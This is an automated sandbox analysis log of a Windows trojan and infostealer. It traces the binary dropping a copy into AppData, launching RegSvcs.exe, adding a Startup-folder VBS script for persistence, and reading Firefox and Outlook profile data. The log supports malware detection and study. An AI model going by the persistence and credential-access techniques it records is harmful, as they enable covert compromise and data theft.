                Source: RHOqJ5BrHW.exe, 00000000.00000003.2043224561.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, RHOqJ5BrHW.exe, 00000000.00000003.2043123913.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, RHOqJ5BrHW.exe, 00000000.00000002.2050344868.0000000000C30000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2051945448.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2052083239.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2182346127.000000000181D000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2182252283.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, acrorrheuma.0.dr | Binary or memory string: 5@B.SlN;M
                Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009CCE7A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009BAB84 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009BB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0045AB84 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0045B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009CE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009C6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009DC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0098406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | File created: C:\Users\user\AppData\Local\Lityerses
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | File created: C:\Users\user\AppData\Local\Temp\aut9C72.tmp
                Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs"
                Source: RHOqJ5BrHW.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: RHOqJ5BrHW.exe | ReversingLabs: Detection: 57%
                Source: RHOqJ5BrHW.exe | Virustotal: Detection: 62%
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeFile read: C:\Users\user\Desktop\RHOqJ5BrHW.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\RHOqJ5BrHW.exe "C:\Users\user\Desktop\RHOqJ5BrHW.exe"
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\Desktop\RHOqJ5BrHW.exe"
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RHOqJ5BrHW.exe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\Desktop\RHOqJ5BrHW.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RHOqJ5BrHW.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" Jump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                Source: Binary string: wntdll.pdbUGP source: unjuridically.exe, 00000002.00000003.2060949043.0000000003470000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2063562070.0000000003610000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2189115994.0000000004100000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2193118279.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: unjuridically.exe, 00000002.00000003.2060949043.0000000003470000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2063562070.0000000003610000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2189115994.0000000004100000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2193118279.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099E01E LoadLibraryA,GetProcAddress,0_2_0099E01E
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009A6B05 push ecx; ret 0_2_009A6B18
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00446B05 push ecx; ret 2_2_00446B18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC06C8 push eax; ret 3_2_00DC0702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC0698 push eax; ret 3_2_00DC0712
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC0698 push eax; ret 3_2_00DC0722
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC0718 push eax; ret 3_2_00DC0722
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC0708 push eax; ret 3_2_00DC0712
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC0728 push eax; ret 3_2_00DC0732
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02E906C8 push eax; ret 6_2_02E906C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02E90698 push eax; ret 6_2_02E906C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02E90728 push eax; ret 6_2_02E90732
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02E90718 push eax; ret 6_2_02E90722
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeFile created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeJump to dropped file

                Boot Survival

                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbsJump to dropped file
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbsJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009E8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_009E8111
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0099EB42
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00488111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00488111
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0043EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_0043EB42
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009A123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009A123A
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
